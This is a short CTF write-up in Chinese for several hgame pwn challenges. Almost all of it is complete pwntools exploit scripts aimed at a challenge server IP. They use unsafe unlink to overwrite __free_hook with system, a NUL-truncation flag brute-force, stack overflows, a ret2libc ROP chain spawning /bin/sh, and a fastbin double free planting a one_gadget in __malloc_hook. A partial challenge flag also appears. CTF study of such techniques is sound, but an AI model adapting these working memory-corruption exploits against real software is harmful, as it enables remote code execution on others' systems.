打了我就記錄一下
(有點記不太清了有點久了~~)
Annevi
這道題是做 2 次 unlink：第一次 unlink 後把 note 指標改成 atoi@got 並 show 出來洩漏 libc，第二次 unlink 後把 note 指標改成 __free_hook 再寫入 system 即可。
#!/usr/bin/python2
from pwn import *
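# Target selection: set local = 1 to debug against a local process, anything
# else attacks the challenge server.  The ELF (and the libc derived from it)
# is loaded once for both cases instead of in each branch.
local = 0
if local == 1:
    p = process('./Annevi')
else:
    p = remote('47.103.214.163', 20301)
elf = ELF('./Annevi')
# NOTE(review): elf.libc is resolved on the machine running this script.  The
# libc symbol offsets used later are therefore only correct for the remote
# target if the server runs the same libc build; otherwise load the libc that
# ships with the challenge (ELF('./libc.so.6')) here instead.
libc = elf.libc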
def add(size, content):
    """Menu option 1: allocate a note, answering the size prompt with ``size``
    and the content prompt with ``content``.  All I/O goes through the global
    tube ``p``; nothing is returned."""
    send = p.sendlineafter
    send(':', '1')
    send('?', str(size))
    send('content:', content)
def delete(idx):
    """Menu option 2: free note number ``idx`` via the global tube ``p``."""
    for prompt, answer in ((':', '2'), ('index?', str(idx))):
        p.sendlineafter(prompt, answer)
def show(idx):
    """Menu option 3: ask the program to print note number ``idx``.

    The caller is responsible for reading the output back from ``p``."""
    for prompt, answer in ((':', '3'), ('index?', str(idx))):
        p.sendlineafter(prompt, answer)
def edit(idx, content):
    """Menu option 4: overwrite note number ``idx`` with ``content``.

    This is the primitive the unlink payloads rely on; there is no length
    check visible from here, which is what allows the fake chunk headers."""
    send = p.sendlineafter
    send(':', '4')
    send('index?', str(idx))
    send('content:', content)
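def exp():
    """Annevi: two unsafe-unlink writes, then __free_hook -> system.

    Everything goes through the global tube ``p`` via add/delete/show/edit, so
    nothing is returned.  0x602040 and 0x602050 are assumed to be slots 0 and 2
    of the note-pointer array in .bss (the unlink maths below only works if
    they are) — taken from the writeup, binary-specific.  The unused
    __malloc_hook / one_gadget locals of the original were dropped.
    """
    add(0x90, 'aaaa')         # 0: will hold the fake chunk for the first unlink
    add(0x90, 'aaaa')         # 1: freed to trigger the first unlink
    add(0x90, 'bbbb')         # 2: will hold the fake chunk for the second unlink
    add(0x90, '/bin/sh\x00')  # 3: freed to trigger the second unlink
    add(0x90, '/bin/sh\x00')  # 4: spare '/bin/sh' note to free once the hook is hijacked

    # Fake chunk written into note 0: size 0x90 (prev_inuse set), fd/bk chosen so
    # that fd->bk == bk->fd == note[0]; the trailing prev_size 0x90 / size 0xa0
    # (prev_inuse clear) header belongs to chunk 1, so freeing it consolidates
    # backwards into the fake chunk and unlinks it.
    fake = p64(0) + p64(0x91) + p64(0x602040 - 0x18) + p64(0x602040 - 0x10)
    fake += 'a' * 0x70 + p64(0x90) + p64(0xa0)
    edit(0, fake)
    delete(1)

    # note[0] now points 0x18 below the pointer array, so writing through it
    # rewrites the array itself: the 4th qword lands on note[0] -> atoi@got.
    edit(0, p64(0) * 3 + p64(elf.got['atoi']))
    show(0)
    leak = p.recvuntil('\x7f')[-6:] + '\x00\x00'
    libcbase = u64(leak) - libc.sym['atoi']
    system = libcbase + libc.sym['system']
    free_hook = libcbase + libc.sym['__free_hook']
    log.success('libcbase: ' + hex(libcbase))

    # Same trick against note 2 / slot 0x602050; freeing note 3 triggers it.
    fake = p64(0) + p64(0x91) + p64(0x602050 - 0x18) + p64(0x602050 - 0x10)
    fake += 'a' * 0x70 + p64(0x90) + p64(0xa0)
    edit(2, fake)
    delete(3)

    # note[2] == 0x602038 after the unlink, so the second qword written here
    # lands on note[0] (0x602040) and turns it into a pointer to __free_hook.
    edit(2, p64(0) + p64(free_hook))
    edit(0, p64(system))  # __free_hook = system
    show(0)
    # Freeing note 4 (its content is '/bin/sh') should now call system('/bin/sh');
    # the writeup leaves that step to the interactive session.
    p.interactive()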
if __name__ == '__main__':
    exp()  # run the exploit only when executed as a script, not on import
Another_Heaven
截斷爆破（先送一個 '\x00' 把字串截斷，再逐個字元試下一個字元），我記得用了好久
from pwn import *
#p=process('./Another_Heaven')
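# Brute-force the next flag character one connection per guess.  A NUL byte is
# sent first so the server's comparison stops early, which is what makes a
# per-character oracle possible; 'Welcome' in the reply means the guess was
# accepted.  Each tube is now closed after use (the original leaked one
# connection per iteration).
KNOWN = 'hgame{VGhlX2Fub3RoZXJfd2F5X3RvX2hlYXZlbg=='
payload = KNOWN
# 97..126 covers 'a'..'~'; widen this if the next byte could be a digit,
# an upper-case letter or '_'.
for j in range(97, 127):
    p = remote('47.103.214.163', 21001)
    try:
        p.recvuntil('!"')
        # What the first prompt asks for is not visible here; 0x602160 + 43 is
        # presumably an address/offset inside the binary — confirm against it.
        p.sendline(str(0x602160 + 43))
        sleep(0.2)
        p.send('\x00')
        p.recvuntil(':')
        p.sendline('E99p1ant')
        p.recvuntil(':')
        payload = KNOWN + chr(j)
        p.sendline(payload)
        replay = p.recv()
    finally:
        p.close()
    if 'Welcome' in replay:
        print("yes!!!" + payload)
        break
print(payload)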
#hgame{VGh
Hard_AAAAA
#!/usr/bin/python2
from pwn import *
# Target selection: local == 1 debugs a local process (and loads the ELF,
# which the exploit itself never uses); anything else hits the challenge server.
local = 0
target = './Hard_AAAAA'
if local != 1:
    p = remote('47.103.214.163', 20000)
else:
    p = process(target)
    elf = ELF(target)
def exp():
    """Hard_AAAAA: send 0xac - 0x31 filler bytes followed by the marker
    '0O0o', a NUL byte and 'O0', then hand the tube over.

    Both the length and the marker come from the writeup and are specific to
    this binary; the embedded NUL presumably cuts a string check short, but
    that cannot be confirmed from this script alone.
    """
    p.recvuntil('!')
    filler = 'a' * (0xac - 0x31)
    marker = '0O0o\x00O0'
    p.sendline(filler + marker)
    p.interactive()
if __name__ == '__main__':
    exp()  # run the exploit only when executed as a script, not on import
One_Shot
#!/usr/bin/python2
from pwn import *
# Target selection: local == 1 for a local process, otherwise the challenge server.
local = 0
p = process('./One_Shot') if local == 1 else remote('47.103.214.163', 20002)
def exp():
    """One_Shot: fill the first prompt with 0x20 bytes, then answer the
    'shot!' prompt with the decimal form of 0x6010E0.

    The address is taken from the writeup and is specific to this binary;
    what the program does with it is not visible here.
    """
    p.recvuntil('?')
    p.sendline('a' * 0x20)
    p.recvuntil('shot!')
    target = 0x06010E0
    p.sendline(str(target))
    p.interactive()
if __name__ == '__main__':
    exp()  # run the exploit only when executed as a script, not on import
ROP_LEVEL0
#!/usr/bin/python2
from pwn import *
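# Target selection: set local = 1 to debug against a local process, anything
# else attacks the challenge server.  The ELF (and the libc derived from it)
# is loaded once for both cases instead of in each branch.
local = 0
if local == 1:
    p = process('./ROP_LEVEL0')
else:
    p = remote('47.103.214.163', 20003)
elf = ELF('./ROP_LEVEL0')
# NOTE(review): elf.libc is resolved on the machine running this script, so
# the puts/system/'/bin/sh' offsets used later match the remote target only
# if the server runs the same libc build; otherwise load the libc shipped
# with the challenge here instead.
libc = elf.libc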
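def exp():
    """ROP_LEVEL0: two-stage ret2libc over the global tube ``p``.

    Stage 1 overflows the buffer, leaks puts@got through puts@plt and returns
    to 0x40065B (from the writeup; presumably re-enters the vulnerable
    routine).  Stage 2 reuses the same overflow to call system('/bin/sh').
    The gadget and return addresses are specific to this binary.  Nothing is
    returned.
    """
    pop_rdi = 0x400753  # pop rdi ; ret
    ret_to = 0x40065B   # where to come back after the leak
    # 0x50 bytes of buffer plus one qword (presumably the saved rbp) before
    # the return address.
    padding = 'a' * 0x50 + p64(0)

    p.recvuntil('./flag')
    leak_chain = (padding + p64(pop_rdi) + p64(elf.got['puts'])
                  + p64(elf.plt['puts']) + p64(ret_to))
    p.send(leak_chain)
    puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
    libcbase = puts_addr - libc.sym['puts']
    system = libcbase + libc.sym['system']
    # next() works on both Python 2 and 3 generators; .next() was Python 2 only.
    bin_sh = libcbase + next(libc.search('/bin/sh'))

    p.recvuntil('./flag')
    # Dummy return address after system; the shell is what we want, not a clean exit.
    shell_chain = padding + p64(pop_rdi) + p64(bin_sh) + p64(system) + p64(0)
    p.send(shell_chain)
    p.interactive()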
if __name__ == '__main__':
    exp()  # run the exploit only when executed as a script, not on import
Roc826
先用 fastbin double free 改 note 指針（指向 puts@got）leak libc，然後再用一次 double free 正常打 __malloc_hook 寫 one_gadget
#!/usr/bin/python2
from pwn import *
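# Target selection: local = 1 (as committed here) debugs against a local
# process; anything else attacks the challenge server.  The ELF (and the libc
# derived from it) is loaded once for both cases instead of in each branch.
local = 1
if local == 1:
    p = process('./Roc826')
else:
    p = remote('47.103.214.163', 21002)
elf = ELF('./Roc826')
# NOTE(review): elf.libc is resolved on the machine running this script.  The
# libc symbols and the hard-coded one_gadget offsets used later are only right
# for the remote target if the server runs the same libc build; otherwise load
# the libc shipped with the challenge here instead.
libc = elf.libc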
def add(size, content):
    """Menu option 1: allocate a note of ``size`` bytes filled from ``content``.

    All I/O goes through the global tube ``p``; nothing is returned."""
    for prompt, answer in ((':', '1'), ('size?', str(size)), ('content:', content)):
        p.sendlineafter(prompt, answer)
def delete(idx):
    """Menu option 2: free note number ``idx`` via the global tube ``p``.

    The exploit calls this twice on the same index (double free), which only
    works because the program evidently does not clear the pointer."""
    send = p.sendlineafter
    send(':', '2')
    send('index?', str(idx))
def show(idx):
    """Menu option 3: ask the program to print note number ``idx``.

    The caller reads the output back from the global tube ``p``."""
    send = p.sendlineafter
    send(':', '3')
    send('index?', str(idx))
def lg(address, data):
    """Log ``data`` in hex under the label ``address`` (despite its name, the
    first argument is the label string, e.g. 'libcbase') via pwntools' log."""
    label = '%s: ' % address
    log.success(label + hex(data))
def exp():
    """Roc826: two fastbin double-frees — the first hijacks a note pointer for
    a libc leak, the second drops a one_gadget into __malloc_hook.

    Everything goes through the global tube ``p``; nothing is returned.  Note
    indices in the comments assume sequential numbering with no slot reuse, as
    the later delete(6)/delete(7) calls imply.
    """
    # Initial layout: notes 3 and 4 are the 0x70-byte fastbin chunks that get
    # double-freed; the rest shape the heap the way the writeup needed.
    for size, text in ((0x50, 'doudou0'),   # 0
                       (0x40, 'douodu1'),   # 1
                       (0x40, 'doudou5'),   # 2
                       (0x68, 'doudou2'),   # 3
                       (0x68, 'doudou3'),   # 4
                       (0x18, 'doudou4')):  # 5
        add(size, text)

    # Free 3 -> 4 -> 3: chunk 3 is now twice in the 0x70 fastbin, so the next
    # allocation returns it while it is still linked, and its fd can be aimed
    # at 0x60208d.  NOTE(review): 0x60208d is presumably a misaligned address
    # in .bss whose size byte passes the fastbin check — confirm in the binary.
    for idx in (3, 4, 3):
        delete(idx)
    add(0x68, p64(0x60208d))  # 6
    add(0x68, 'dd0')          # 7
    add(0x68, 'dd1')          # 8
    # 9 lands on the fake chunk; the final qword overwrites the pointer of
    # note 2 with puts@got, so show(2) prints a libc address.
    add(0x60, p64(0) * 2 + '\xaa\xaa\xaa' + p64(elf.got['puts']))
    show(2)
    puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
    libcbase = puts_addr - libc.sym['puts']
    # one_gadget candidates as listed in the writeup (the fourth is used).
    # NOTE(review): these offsets belong to one specific libc build and must
    # match the libc the target actually runs.
    gadgets = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
    malloc_hook = libcbase + libc.sym['__malloc_hook']
    one_gadget = libcbase + gadgets[3]
    lg('libcbase', libcbase)

    # Second double free on 6 -> 7 -> 6, this time steering the 0x70 chunk to
    # malloc_hook - 0x23, the usual fake chunk just before __malloc_hook.
    for idx in (6, 7, 6):
        delete(idx)
    add(0x68, p64(malloc_hook - 0x23))  # 10
    add(0x68, 'su')                     # 11
    add(0x68, 'su1')                    # 12
    # 13: user data starts at malloc_hook - 0x13, so 19 bytes of padding put
    # the gadget address exactly on __malloc_hook.
    add(0x68, 'a' * 19 + p64(one_gadget))
    show(8)  # kept from the original; its purpose is not evident from here
    # Any malloc now runs the gadget: request a 1-byte note.
    p.sendlineafter(':', '1')
    p.sendlineafter('size?', str(1))
    p.interactive()
if __name__ == '__main__':
    exp()  # run the exploit only when executed as a script, not on import